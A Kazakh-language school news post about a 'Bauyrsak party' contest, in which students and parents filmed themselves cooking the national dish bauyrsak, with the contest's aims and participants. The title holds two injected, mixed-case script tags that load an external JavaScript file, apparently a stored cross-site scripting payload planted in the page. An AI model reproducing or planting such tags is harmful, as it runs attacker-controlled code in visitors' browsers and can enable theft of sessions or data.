«Bauyrsak party»<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

17.03.2021

     17-18 наурыз аралығында     «Bauyrsak party»  ұлттық тағамдардың қашықтық форматында видеоролик байқауы мектебізде өтеді. Іріктеуден өткен видео аудандық сайысқа қатысады. Аталған сайысқа  жоғары сыныптар қатысып, белсенділік танытты.

Байқаудың негізгі мақсаты мен міндеттері:

  • Отбасы құндылығын, оның қадірін, қасиетін сезінуге, әртүрлі ұлт өкілдерімен, халықтар достығын  дәріптеу;
  • Ұлттық тағмдардың тарихын білуге, ұлт тарихына танымдық қызығушылығын арттыру.

Аталған сайысқа 10 сынып оқушысы – Тулеубаева Саина мен анасы – Шокишева Айнагуль қатысып, өз бағын сынады.

«Бауырсақ-қазақтың ұлттық тағамы. Бауырсақ - әр қазақтың дастарқанының сәнін келтіреді», - деп қатысушалырымыз айтып өтті. Видео түсіру барысында бауырсақ  пісіруге қажетті өнімдеріне, дайындау тәсіліне сайыскерлеріміз тоқталып өтті.

Қызыл домалақтарын пісіріп болған соң, мектеп оқушыларына таратып, дәмін татқызды. Отбасы құндылығын, оның қадірін, қасиетін сезінуге «Bauyrsak party»  сайысының тәрбиелік мәні өте зор.

Біз алғашқы өткізілгеніне қарамастан бұл сайысты одан әрі мектебімізде жалғастырмақ ойымыз бар.

Ал сайыскерлерімізге сәттілік тілей отыра, жеңіске жетулеріне тілектеспін!

Просмотров: 507


Пікір қосу



Деректерді қолтаңбаға қосу